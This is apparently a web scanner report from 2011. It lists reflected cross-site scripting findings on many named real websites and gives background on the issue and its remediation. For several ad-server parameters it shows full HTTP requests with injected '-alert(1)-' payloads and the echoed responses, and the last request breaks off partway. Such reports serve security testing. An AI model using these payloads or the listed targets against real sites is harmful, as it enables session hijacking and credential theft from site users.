http://www.theroot.com/multimedia/50-years-black-history [name of an arbitrarily supplied request parameter]
http://www.theroot.com/views/2011/young-futurists [REST URL parameter 1]
http://www.theroot.com/views/2011/young-futurists [REST URL parameter 2]
http://www.theroot.com/views/2011/young-futurists [REST URL parameter 2]
http://www.theroot.com/views/2011/young-futurists [REST URL parameter 3]
http://www.theroot.com/views/2011/young-futurists [gt1 parameter]
http://www.theroot.com/views/2011/young-futurists [name of an arbitrarily supplied request parameter]
http://www.theroot.com/views/meet-25-people-who-will-change-our-world [REST URL parameter 1]
http://www.theroot.com/views/meet-25-people-who-will-change-our-world [REST URL parameter 2]
http://www.theroot.com/views/meet-25-people-who-will-change-our-world [REST URL parameter 2]
http://www.theroot.com/views/meet-25-people-who-will-change-our-world [gt1 parameter]
http://www.theroot.com/views/meet-25-people-who-will-change-our-world [name of an arbitrarily supplied request parameter]
http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter]
http://ad.harrenmedianetwork.com/imp [Referer HTTP header]
http://ad.harrenmedianetwork.com/st [Referer HTTP header]
http://ad.scanmedios.com/imp [Referer HTTP header]
http://ad.scanmedios.com/st [Referer HTTP header]
http://api.bizographics.com/v1/profile.json [Referer HTTP header]
https://api.bizographics.com/v1/profile.json [Referer HTTP header]
https://gc.synxis.com/XBE/Popups/InfoPopup.aspx [User-Agent HTTP header]
https://gc.synxis.com/XBE/Popups/InfoPopup.aspx [User-Agent HTTP header]
https://gc.synxis.com/rez.aspx [User-Agent HTTP header]
https://gc.synxis.com/xbe/rez.aspx [User-Agent HTTP header]
http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]
http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]
http://updates.orbitz.com/ [Referer HTTP header]
http://updates.orbitz.com/flight_status [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.ehow.com/ [Referer HTTP header]
http://www.ehow.com/MailingList.html [Referer HTTP header]
http://www.ehow.com/about_us/about_us.aspx [Referer HTTP header]
http://www.ehow.com/about_us/contact_us.aspx [Referer HTTP header]
http://www.ehow.com/about_us/faq_ehow.aspx [Referer HTTP header]
http://www.ehow.com/about_us/link_to_us.aspx [Referer HTTP header]
http://www.ehow.com/ajax/ [Referer HTTP header]
http://www.ehow.com/arts-and-crafts/ [Referer HTTP header]
http://www.ehow.com/arts-and-entertainment/ [Referer HTTP header]
http://www.ehow.com/at-home/ [Referer HTTP header]
http://www.ehow.com/beauty-and-personal-care/ [Referer HTTP header]
http://www.ehow.com/blog/ [Referer HTTP header]
http://www.ehow.com/business/ [Referer HTTP header]
http://www.ehow.com/car-repair-and-maintenance/ [Referer HTTP header]
http://www.ehow.com/careers/ [Referer HTTP header]
http://www.ehow.com/cars/ [Referer HTTP header]
http://www.ehow.com/community.html [Referer HTTP header]
http://www.ehow.com/computer-software/ [Referer HTTP header]
http://www.ehow.com/computers/ [Referer HTTP header]
http://www.ehow.com/culture-and-society/ [Referer HTTP header]
http://www.ehow.com/diseases-and-conditions/ [Referer HTTP header]
http://www.ehow.com/drugs-and-supplements/ [Referer HTTP header]
http://www.ehow.com/education/ [Referer HTTP header]
http://www.ehow.com/ehow-family/ [Referer HTTP header]
http://www.ehow.com/ehow-food/ [Referer HTTP header]
http://www.ehow.com/ehow-health/ [Referer HTTP header]
http://www.ehow.com/ehow-home/ [Referer HTTP header]
http://www.ehow.com/ehow-mobile.aspx [Referer HTTP header]
http://www.ehow.com/ehow-money/ [Referer HTTP header]
http://www.ehow.com/ehow-style/ [Referer HTTP header]
http://www.ehow.com/ehow-tax-time/ [Referer HTTP header]
http://www.ehow.com/electronics/ [Referer HTTP header]
http://www.ehow.com/family-health/ [Referer HTTP header]
http://www.ehow.com/fashion-and-style/ [Referer HTTP header]
http://www.ehow.com/fitness/ [Referer HTTP header]
http://www.ehow.com/flu-season/ [Referer HTTP header]
http://www.ehow.com/food-and-drink/ [Referer HTTP header]
http://www.ehow.com/forums.aspx [Referer HTTP header]
http://www.ehow.com/groups.aspx [Referer HTTP header]
http://www.ehow.com/healthcare/ [Referer HTTP header]
http://www.ehow.com/healthy-living/ [Referer HTTP header]
http://www.ehow.com/hobbies-and-science/ [Referer HTTP header]
http://www.ehow.com/holidays-and-celebrations/ [Referer HTTP header]
http://www.ehow.com/home-building-and-remodeling/ [Referer HTTP header]
http://www.ehow.com/home-design-and-decorating/ [Referer HTTP header]
http://www.ehow.com/home-maintenance-and-repair/ [Referer HTTP header]
http://www.ehow.com/home-safety-and-household-tips/ [Referer HTTP header]
http://www.ehow.com/home-security-alarm/ [Referer HTTP header]
http://www.ehow.com/housekeeping/ [Referer HTTP header]
http://www.ehow.com/how-to.html [Referer HTTP header]
http://www.ehow.com/how_13299_know-someone-lying.html [Referer HTTP header]
http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html [Referer HTTP header]
http://www.ehow.com/how_2077554_repair-cracks-dashboard.html [Referer HTTP header]
http://www.ehow.com/how_2113353_end-sibling-feuds.html [Referer HTTP header]
http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html [Referer HTTP header]
http://www.ehow.com/how_3815_minutes-business-meeting.html [Referer HTTP header]
http://www.ehow.com/how_4469163_edit-pdf-document.html [Referer HTTP header]
http://www.ehow.com/how_4474239_make-graph-using-excel.html [Referer HTTP header]
http://www.ehow.com/how_4924781_open-pub-file-mac.html [Referer HTTP header]
http://www.ehow.com/how_5073161_convert-wps-file-extension.html [Referer HTTP header]
http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html [Referer HTTP header]
http://www.ehow.com/how_5381925_make-roof-rake.html [Referer HTTP header]
http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html [Referer HTTP header]
http://www.ehow.com/how_5809012_create-indoor-gardens.html [Referer HTTP header]
http://www.ehow.com/how_6469141_improve-english-grammar-skills.html [Referer HTTP header]
http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html [Referer HTTP header]
http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html [Referer HTTP header]
http://www.ehow.com/how_7856914_prevent-chimney-fires.html [Referer HTTP header]
http://www.ehow.com/how_9191_program-rca-universal.html [Referer HTTP header]
http://www.ehow.com/internet/ [Referer HTTP header]
http://www.ehow.com/job-search-and-employment/ [Referer HTTP header]
http://www.ehow.com/lawn-and-garden/ [Referer HTTP header]
http://www.ehow.com/legal/ [Referer HTTP header]
http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html [Referer HTTP header]
http://www.ehow.com/list_7189463_grammar-check-tools.html [Referer HTTP header]
http://www.ehow.com/lose-weight/ [Referer HTTP header]
http://www.ehow.com/members.html [Referer HTTP header]
http://www.ehow.com/mental-health/ [Referer HTTP header]
http://www.ehow.com/music/ [Referer HTTP header]
http://www.ehow.com/parenting/ [Referer HTTP header]
http://www.ehow.com/personal-finance/ [Referer HTTP header]
http://www.ehow.com/pets-and-animals/ [Referer HTTP header]
http://www.ehow.com/photos/ [Referer HTTP header]
http://www.ehow.com/plant-care/ [Referer HTTP header]
http://www.ehow.com/plants/ [Referer HTTP header]
http://www.ehow.com/privacy.aspx [Referer HTTP header]
http://www.ehow.com/real-estate-and-investment/ [Referer HTTP header]
http://www.ehow.com/recipes/ [Referer HTTP header]
http://www.ehow.com/recreational-activities/ [Referer HTTP header]
http://www.ehow.com/relationships-and-family/ [Referer HTTP header]
http://www.ehow.com/search.aspx [Referer HTTP header]
http://www.ehow.com/share.html [Referer HTTP header]
http://www.ehow.com/site-map.html [Referer HTTP header]
http://www.ehow.com/sitemap.html [Referer HTTP header]
http://www.ehow.com/sports/ [Referer HTTP header]
http://www.ehow.com/terms_use.aspx [Referer HTTP header]
http://www.ehow.com/topic_227_take-pictures.html [Referer HTTP header]
http://www.ehow.com/topic_2488_lose-weight.html [Referer HTTP header]
http://www.ehow.com/topic_253_lose-weight-now.html [Referer HTTP header]
http://www.ehow.com/topic_3493_lose-weight-dieting.html [Referer HTTP header]
http://www.ehow.com/topic_363_winter-sports.html [Referer HTTP header]
http://www.ehow.com/topic_3818_flu-guide.html [Referer HTTP header]
http://www.ehow.com/topic_3990_home-security-systems-guide.html [Referer HTTP header]
http://www.ehow.com/topic_401_home-alarms.html [Referer HTTP header]
http://www.ehow.com/topic_4028_preparing-flu-season.html [Referer HTTP header]
http://www.ehow.com/topic_4127_home-alarm-system-guide.html [Referer HTTP header]
http://www.ehow.com/topic_429_all-flu.html [Referer HTTP header]
http://www.ehow.com/topic_4989_photo-sharing-101.html [Referer HTTP header]
http://www.ehow.com/topic_49_treating-colds-flus.html [Referer HTTP header]
http://www.ehow.com/topic_5023_jog-lose-weight.html [Referer HTTP header]
http://www.ehow.com/topic_689_black-white-photos.html [Referer HTTP header]
http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [Referer HTTP header]
http://www.ehow.com/topic_7853_floor-fountains-guide.html [Referer HTTP header]
http://www.ehow.com/topic_7992_floor-water-fountains-101.html [Referer HTTP header]
http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [Referer HTTP header]
http://www.ehow.com/topic_8047_water-garden-fountains-101.html [Referer HTTP header]
http://www.ehow.com/toys-and-games/ [Referer HTTP header]
http://www.ehow.com/unavailable.aspx [Referer HTTP header]
http://www.ehow.com/us-travel/ [Referer HTTP header]
http://www.ehow.com/vacations-and-travel-planning/ [Referer HTTP header]
http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [Referer HTTP header]
http://www.ehow.com/video_6976779_sensational-snacks.html [Referer HTTP header]
http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [Referer HTTP header]
http://www.ehow.com/videos.html [Referer HTTP header]
http://www.ehow.com/weddings-and-parties/ [Referer HTTP header]
http://www.ehow.com/weight-management-and-body-image/ [Referer HTTP header]
http://www.ehow.com/winterize-a-garden/ [Referer HTTP header]
https://www.ehow.com/WebResource.axd [Referer HTTP header]
https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css [Referer HTTP header]
https://www.ehow.com/forms/ [Referer HTTP header]
https://www.ehow.com/forms/PasswordRetrieval.aspx [Referer HTTP header]
https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx [Referer HTTP header]
https://www.ehow.com/forms/signin.aspx [Referer HTTP header]
https://www.ehow.com/privacy.aspx [Referer HTTP header]
https://www.ehow.com/terms_use.aspx [Referer HTTP header]
http://blekko.com/join [name of an arbitrarily supplied request parameter]
http://blekko.com/login [name of an arbitrarily supplied request parameter]
http://seg.sharethis.com/getSegment.php [__stid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [campID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c8"-alert(1)-"ed8d98066a7 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8925

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D87663
...[SNIP]...

4.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [crID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"6726dbbe500 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8982

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F
...[SNIP]...

4.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [partnerID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 112f0"-alert(1)-"3c37d85996f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2ffree.turbotax.c
...[SNIP]...

4.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3b8"-alert(1)-"ad6539c90a was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
